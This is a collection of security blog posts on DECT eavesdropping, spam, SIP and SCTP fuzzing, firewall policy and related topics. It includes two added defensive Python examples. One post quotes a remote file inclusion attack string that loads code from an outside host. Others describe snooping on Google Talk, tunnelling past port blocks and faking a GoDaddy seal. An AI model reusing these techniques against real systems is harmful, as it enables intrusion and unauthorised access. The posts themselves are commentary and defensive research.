All your (base) stations belong to us

What started off nicely in 1992 and promised the much needed privacy to cordless communication at home has been brought to a halt a few days ago by a practical approach to eavesdropping on DECT communication.

DECT, or Digital Enhanced Cordless Telecommunication, is a widely used standard for cordless devices, mainly phones but not limited to them; several POS (Point of Sale) devices also use the standard to communicate in a cheap and secure manner.

The DECT standard itself was not broken; rather, using a cheap off-the-shelf device that is able to receive (not yet transmit) DECT data, the researchers were able to prove that eavesdropping on the communication channel is possible.

Most interesting to me as a reader of the paper is that what stopped people from ‘breaking’ it until now was the lack of hardware, or rather the lack of cheap hardware, to experiment with. Now, with the availability (it has been around for a while) of the COM-ON-AIR device and its character device (a raw software driver), things have been made a lot easier.

You can read more on this at


Encoded message as an effective spam?

Following up on my previous post on spam, it seems that spam has now gone another step and become not just unreadable – foreign language – but also unreadable to the un-computerized eye:

Subject: Please confirm your message



Wow that is nice, I would sure want to buy an IURPQ1…

This is plain silly: it is a Base64 encoded message, but why would my reader open it?

There is an indication in the email headers that this is Base64 encoded, but I can’t understand what kind of reader will even try to open it, as it seems that Base64 encoded content inside a body is not common practice unless it is part of a multipart message.

For those wondering, the email’s intention is to show you an HTML page that sells you fake? real? pills.
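As an added example (not from the original post), here is a small triage script in Python's standard library that does what a spam filter or a curious reader would do with such a message: it decodes the single-part Base64 body regardless of how the mail client renders it, flags the unusual combination of a non-multipart message with a base64 Content-Transfer-Encoding, and lists the links the hidden HTML points at. The two sample messages, their body text and the example.invalid addresses are constructed; the real spam's body is not reproduced.

```python
"""Decode and flag a single-part Base64 mail body (added example, not the post's code)."""
import base64
import email
import re
from email import policy

# Constructed sample: what the spam described above looks like on the wire.
# The hidden body text and the example.invalid addresses are made up.
HIDDEN_BODY = (
    "<html><body>Cheap pills, order today: "
    "<a href='http://pharmacy.example.invalid/order'>click</a></body></html>"
)
RAW_SPAM = (
    "From: sender@example.invalid\r\n"
    "To: me@example.invalid\r\n"
    "Subject: Please confirm your message\r\n"
    "MIME-Version: 1.0\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Content-Transfer-Encoding: base64\r\n"
    "\r\n"
    + base64.b64encode(HIDDEN_BODY.encode("utf-8")).decode("ascii")
    + "\r\n"
)

# Constructed control message: ordinary plain text, nothing to flag.
RAW_PLAIN = (
    "From: colleague@example.invalid\r\n"
    "To: me@example.invalid\r\n"
    "Subject: lunch?\r\n"
    "MIME-Version: 1.0\r\n"
    "Content-Type: text/plain; charset=us-ascii\r\n"
    "Content-Transfer-Encoding: 7bit\r\n"
    "\r\n"
    "Noon at the usual place?\r\n"
)

LINK_RE = re.compile(r"""href\s*=\s*['"]([^'"]+)['"]""", re.IGNORECASE)


def decode_body(raw: str) -> str:
    """Return the body as text, undoing base64/quoted-printable whatever the client shows."""
    msg = email.message_from_string(raw, policy=policy.default)
    # For multipart mail pick the html or plain part; for single-part mail the message is the part.
    part = msg.get_body(preferencelist=("html", "plain")) if msg.is_multipart() else msg
    return part.get_content() if part is not None else ""


def triage(raw: str) -> dict:
    """Summarise the message: flags worth a filter rule, the decoded body and its links."""
    msg = email.message_from_string(raw, policy=policy.default)
    cte = (msg.get("Content-Transfer-Encoding") or "").strip().lower()
    flags = []
    # A human-written single-part message is almost never base64 as a whole;
    # the post above notes that this normally only appears inside multipart mail.
    if not msg.is_multipart() and cte == "base64":
        flags.append("base64-single-part-body")
    # HTML with no text alternative is another cheap signal worth recording.
    if not msg.is_multipart() and msg.get_content_type() == "text/html":
        flags.append("html-only-no-text-part")
    body = decode_body(raw)
    return {
        "subject": str(msg["Subject"]),
        "flags": flags,
        "body": body,
        "links": LINK_RE.findall(body),
    }


if __name__ == "__main__":
    for raw in (RAW_SPAM, RAW_PLAIN):
        report = triage(raw)
        print(report["subject"], report["flags"], report["links"])
```

The flags are meant as inputs to an existing filter (a bogofilter or SpamAssassin style score), not as a verdict on their own: a legitimate mailer can emit a base64 single-part body for non-ASCII text, so the signal is best combined with the decoded body's content and links.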


Snoop on Google Talk (Wiretap)

Yes, snooping on someone else’s GoogleTalk is no big deal if you know their password, but what is interesting is that, unlike other chat clients like Skype, MSN and others, GoogleTalk will allow you to do so simultaneously.

You can connect to the GoogleTalk server while another user using the same username and password is also connected to the GoogleTalk server.

This neat feature, which probably stems from the fact that Google supports web based chat in a constantly refreshing web page (unlike MSN, which launches a separate window), allows you to see incoming responses and messages being sent to your target without needing to do anything.

BTW Google, don’t fix this, I find it useful for my BlackBerry and PC chat sharing – basically I never need to log on/off on my PC/BlackBerry, they are both constantly connected to the Google Talk servers.

UPDATE This post is not related to the recently released NSA patent on Snoop detection :D


SCTP fuzzing made easy

With the recent introduction of a native SCTP library into beSTORM you can easily fuzz your SCTP based protocols with beSTORM.

This includes all our existing protocols as well as SCTP dedicated protocols such as M3UA and MGCP.

SCTP, for those that aren’t familiar with it, is a fairly common protocol in the VoIP and telecommunication industry; it sits upon IP and ‘replaces’ the TCP/UDP layer. It has several benefits over TCP and UDP, but it is mainly used because it has been endorsed by the SIGTRAN group as the primary way of communication between two telecommunication providers.


Why blindly blocking everything is bad for you

Many administrators blindly block anything that isn’t running on either port 80 (http), 443 (https) or 22 (ssh). Their claim is that nothing good can work on any other port. This causes their users to get frustrated when they want to use anything else that runs on any other port.
I am not talking about P2P or any other ‘evil’ programs, which are pretty good at bypassing your restrictions on their own (Skype is one such example); I am talking about, for example, one of your engineers wanting to get tech support but having his corporate VPN access blocked, as most VPNs require at least one port other than 80, 443 or 22 to be open.

In such cases (as with VPN), the tech support guy will find a way around your restriction, perhaps using port 443 to tunnel the traffic through, even though it’s not really SSL going inside there :) . The smart administrator will use a proxy or a content filtering agent to prevent such things, so a smart tech support guy will tunnel everything via SSH, or even use HTTPS to tunnel the data (there are several solutions that do that).

My point is that blindly blocking will give you the benefit of stopping the common user, but will frustrate a tech support guy to the point that he will find a way to bypass it. I suggest that you ‘give’ the tech support guy a hand, understand what he needs, and give him that. It’s better than him bypassing your restriction.

I am sure the readers have additional examples that can strengthen this point.


Tears to my eyes

Yes, this should have brought tears to your eyes too: Spam Volumes Drop by Two-Thirds After Firm Goes Offline. But luckily I cried too soon; I have seen spam amounts on the increase in the past 2 weeks. And unlike previous spam, which my bogofilter and spamassassin were able to handle, this new spam is something that they can’t – or at least can’t yet.

I wonder what happened to make spam more ‘intelligent’. One thought that comes to my mind is that since the massive botnet that was used to send spam is now owned by someone else, the spam now looks different – something else generates it, while the same network sends it out.

I hope they catch the guy who’s keeping this network alive, and take it down once more; we deserve the relief from spam for a few days at least :)

On a side note, I have seen an increase in foreign spam, natively written Russian, Chinese and Japanese spam – this is even more silly than regular English written spam, as I can’t even begin to wonder what they are trying to sell me :)


Obscured busines

Even to write spam you apparently need:

1) A spell checker :)

2) To understand what the words mean

This is the spam email I received, why would someone even want to answer it?

I am Ming Yang,i have an obscured busines suggestion for you.please
Contact me for further details on ( [removed] )

Kind Regards
Ming Yang
Mail: [removed]


Is that a crash in your email reader or are you just happy to see me?

I recently received an email from a co-worker, and upon clicking on it (to preview it) my email reader crashed.

The crash was so weird, that I had to try it again :) I reopened the email reader and clicked on the email again, of course it crashed once more.

I investigated the matter a bit further, and I noticed that the email contained a TNEF file which my email reader tried to automatically parse, and apparently failed due to a bad memcpy call (copying more than you have allocated space for).

Once I zero in on what is triggering it, I will report it to the vendor.


Buying from spam

I recently received a spam email that wants me to buy solar lamps for the garden, my first impulse of course was to delete it. But I had to admit, I wanted those solar lamps, they looked nice, and the price was ok.

I have no idea what to do now. On the one hand, this was sent as part of a spam campaign, and buying it might prove to be:

1) Fraudulent – pay, get nothing (best chances)
2) A scam – pay, get nothing worth your money (moderate chances)
3) A legitimate deal – pay and get what I paid for (slim chances)
In addition, of course, there is the fact that if I buy it, I am proving the spammer’s agenda: that someone wants their merchandise and this is their only way to reach them.

What do you guys suggest I do?


My Baby’s Birth

You are probably reading this post, asking yourself “why does he even let me know”. So I will start by saying that my boy had his birthday a few months ago, so this post isn’t about him, it’s completely unrelated.

It has to do with this site: http://babycaleb.fort (I broke the link so people do not JUST jump and go to it)

This site isn’t mine; it was used to hack a friend’s web site, so I took it upon myself to look into it.

This site hosts a few pictures, some are quite weird to put online (hint to: My Wifes Scar), while others are completely harmless (hint to: My baby).

The issue is not in the pictures but rather what is there and cannot be seen without doing a bit of digging.

I will give some more hints in a follow-up post, if no one else comes up with what this site does to you.

(Another hint: the site of my friend was hacked using this link: /clock.php?arg_tmirror=http://babycaleb.fortu )


RFC 4475 is not enough

When beSTORM is used to test VoIP products, it’s usually the standard SIP, SDP and RTP fuzzing. But we were recently asked for our opinion on RFC 4475, which was an interesting case study. RFC 4475, for those who do not know, is an IETF standard whose goal is to give examples of Session Initiation Protocol (SIP) test messages designed to exercise and “torture” a SIP implementation. This is great, but as the RFC states, these are just a few examples – to be more specific, 49 discrete examples.

These 49 examples claim to check a broad range of problems that a SIP parser may come across and that it should either ignore, reject or handle correctly. These examples try to test more than one malformed, incorrect or problematic field at a time – opening the possibility that one problematic field prevents others from being processed.

My problem with these 49 cases is that they seem to be very tailored, testing for specific things without testing all the possible variations of that same example. Let’s take the Content-Length header. One example checks the resilience to a negative value, another to a large positive one, yet another to the value of zero (0). Did you notice what is missing? For example, where are the off-by-one underflows/overflows?

Another example is the use of IP addresses inside the sample data: carelessness or a small oversight by the tester might make the whole example invalid and not parseable by the test subject. It might be discarded by the product, making the entire test worthless but the tester happy for ‘passing’ the test. It’s like passing a final exam by not showing up!
In conclusion, running those 49 examples is not straightforward, and once you have run them and passed, can you say you are ok? From experience I can tell you that in many cases, both our customers and open source products we have tested with beSTORM failed the complete fuzzing test while they passed RFC 4475 – beSTORM simply discovered one or more vulnerabilities in them that didn’t fit any of the 49 examples provided inside the RFC 4475 torture examples.

My recommendation? Testing for those 49 examples only tells you that you are compliant with RFC 4475. Only a serious fuzzer will tell you if your product is secure against SIP, SDP or RTP based attacks.
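As an added example (not beSTORM's code or anything from the RFC), the following Python parses a SIP datagram the way RFC 3261 asks and then runs it against the Content-Length variations the post lists plus the off-by-one cases it says are missing. A Content-Length larger than the bytes present is rejected as truncated; one smaller than the body is accepted with the excess discarded, which is where an off-by-one read past the buffer would otherwise happen; negative, non-numeric and absurdly large values are rejected before any body byte is touched. The message template, the body and the 192.0.2.x addresses (the documentation range, so the samples stay parseable offline, the pitfall the post warns about) are constructed, and the 64 KiB body ceiling is an assumption.

```python
"""SIP datagram parser with Content-Length handling, plus the header variants
the post discusses (added example, not beSTORM's or the RFC's code)."""
import re

MAX_BODY = 65535   # assumption: a sane ceiling for a single UDP datagram body
DIGITS = re.compile(rb"[0-9]+")


class SipError(ValueError):
    """The message is rejected before any body bytes are used."""


def parse_sip(raw: bytes, max_body: int = MAX_BODY) -> dict:
    """Split a SIP datagram into start line, headers and body, honouring Content-Length."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise SipError("no end-of-headers CRLFCRLF")
    lines = head.split(b"\r\n")
    try:
        start_line = lines[0].decode("ascii")
    except UnicodeDecodeError as exc:
        raise SipError("non-ASCII start line") from exc
    if len(start_line.split(" ")) != 3:
        raise SipError("start line is not three tokens")
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon or not name.strip():
            raise SipError("malformed header line %r" % line)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    # "l" is the compact form of Content-Length (RFC 3261 section 20).
    declared_values = headers.get(b"content-length", []) + headers.get(b"l", [])
    if declared_values:
        if len(set(declared_values)) > 1:
            raise SipError("conflicting Content-Length values %r" % declared_values)
        value = declared_values[0]
        # Only unsigned decimal digits: this rejects "-1", "+5", "0x10" and empty values.
        if not DIGITS.fullmatch(value):
            raise SipError("Content-Length is not a non-negative integer: %r" % value)
        declared = int(value)
        if declared > max_body:
            raise SipError("Content-Length %d exceeds limit %d" % (declared, max_body))
        if declared > len(body):
            # Datagram ended before the body did: RFC 3261 section 18.3 says discard.
            raise SipError("Content-Length %d but only %d body bytes present" % (declared, len(body)))
        # Any bytes past the declared body are discarded, never read.
        body = body[:declared]
    return {"start_line": start_line, "headers": headers, "body": body}


# Constructed template; 192.0.2.0/24 is the documentation address range.
HEAD = (
    b"INVITE sip:bob@example.invalid SIP/2.0\r\n"
    b"Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK-demo\r\n"
    b"From: <sip:alice@example.invalid>;tag=1\r\n"
    b"To: <sip:bob@example.invalid>\r\n"
    b"Call-ID: demo@192.0.2.10\r\n"
    b"CSeq: 1 INVITE\r\n"
    b"Content-Type: application/sdp\r\n"
)
BODY = b"v=0\r\ns=test\r\n"


def build(content_length: bytes, body: bytes = BODY) -> bytes:
    """Assemble a datagram with the given literal Content-Length value."""
    return HEAD + b"Content-Length: " + content_length + b"\r\n\r\n" + body


def content_length_cases(body: bytes = BODY) -> dict:
    """The RFC 4475 style variants plus the off-by-one cases the post says are missing."""
    n = len(body)
    return {
        "exact": build(str(n).encode(), body),
        "zero": build(b"0", body),
        "negative": build(b"-1", body),
        "huge": build(b"4294967295", body),
        "non_numeric": build(b"0x10", body),
        "under_by_one": build(str(n - 1).encode(), body),
        "over_by_one": build(str(n + 1).encode(), body),
    }


def run_cases() -> dict:
    """Map each case name to ('accepted', body length) or ('rejected', None)."""
    results = {}
    for name, datagram in content_length_cases().items():
        try:
            results[name] = ("accepted", len(parse_sip(datagram)["body"]))
        except SipError:
            results[name] = ("rejected", None)
    return results


if __name__ == "__main__":
    for name, verdict in run_cases().items():
        print("%-13s %s" % (name, verdict))
```

The datagram rules are deliberate: over a stream transport such as TCP the bytes past Content-Length are the start of the next message rather than garbage to discard, so a TCP-side parser keeps them in its buffer, but the acceptance and rejection decisions for the header value itself are the same.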


Security seal? sure have one, don’t bother testing or anything

GoDaddy has decided to start giving away security seals to web sites. What is this security seal about? Well, it doesn’t say much beside telling you that GoDaddy verified something – what did they verify? It doesn’t say.

How does it work?

You are supposed to put a script tag inside your site, with the source reference of [removed]

This generates HTML code that contains references to:

Changing the to, or even will show that you have been verified by GoDaddy – yeah!

Try it out yourself and see how you can get a godaddy seal with no effort – joy to the world :)


SCO? Anybody home?

I have been trying to contact the guys at SCO to report a serious vulnerability in their operating system as part of our SSD program, with very little success:

All the emails I send there return with this funny bounce message:

Sorry. Although I’m listed as a best-preference MX or A for that host, it isn’t in my control/locals file, so I don’t treat it as local. (#5.4.6)

A few other emails I sent to people I used to know there, bounced with the same message.

If anyone from SCO reads this post, or you know someone that can help me reach those guys, I would be grateful if you can contact me.


Disaster recovery not just for natural disasters

There is always a lot of talk about disaster recovery being important against floods, weather, power failures, etc. But there is very little talk on disaster recovery due to security events.

When a security event happens, it is a disaster. It can mean downtime to your web site, or that your records were deleted or modified, and sometimes the biggest disaster is the bad PR day.

Typical disaster plans talk about a short failover time, but neglect to take into account what happens if one server was compromised. In this case, how will the short failover time affect it – will the corrupt or modified data propagate to the failover server causing two failed sites instead of one?

With recent break-ins reaching the news, where extremist groups hack into any site they can gain access to, I too often see the web site show a banner just after the break-in, saying that it will be back in a few days. I’m left wondering whether, when they’re back, they will still suffer from the same security hole (most likely an SQL injection) that let the attackers in in the first place. What about hidden malware – was the server reinstalled from scratch? And what backup was used to restore – the one with the attacker’s backdoor? I think we all know the answers…


Office file specs released – new vulnerabilities to come?

As Microsoft released the Office file specs for the upcoming Office 2007, I can’t stop thinking that even though these are specs for Office 2007 files, they must have similarities with, and be at least partly backward compatible with, Office 200x.

This means they can be used by vulnerability researchers (good and bad) to more easily discover new vulnerabilities in Office, as with the spec laid out, complete and systematic searching can be done.

Time will tell – let’s start counting how many Office related vulnerabilities are released over the next few months, and see if we can find a correlation.


“Security is a thing of the past”

I recently talked to my friend, a nice guy but with limited computer skills, and what he told me quite amazed me:

I stopped caring about security. I no longer install Microsoft patches unless they install themselves automatically, I don’t upgrade my antivirus, antimalware or any other protection mechanism, I simply can’t spend the time doing it – my work is not my computer – the computer is a tool for me. You can’t expect me to be an engineer and fix my car, right? So why is this expected from me with my computer?

Why was he talking like that? Well, simply put, he is tired. He is tired of worrying about his computer security, about whether his antivirus is the latest, whether his malware prevention works, whether the patches are needed or not.

Security has become such a burden on ordinary people that they no longer care about it.

And don’t get him wrong, he is a good guy; he even recently upgraded his hardware to accommodate his new OS installation of Vista – this because he was “promised” that Vista resolved all the security issues and that everything would be seamless – security wise – but of course it isn’t.

Vista is no different from previous OSes; XP promised and failed, and I don’t see how the next OS will be able to deliver on its promise of a secure OS.

Before you jump and say move to Linux: my friend here hasn’t the option to move to Linux, as he needs several programs critical to his job that aren’t available for Linux – of course there are alternatives to them, but he is a professor, not a kid; he has work to do with these programs and he can’t just switch to a different OS and different programs now, he has jobs to hand in and research to do.

I am not sure what I can do for him – beside comfort him :)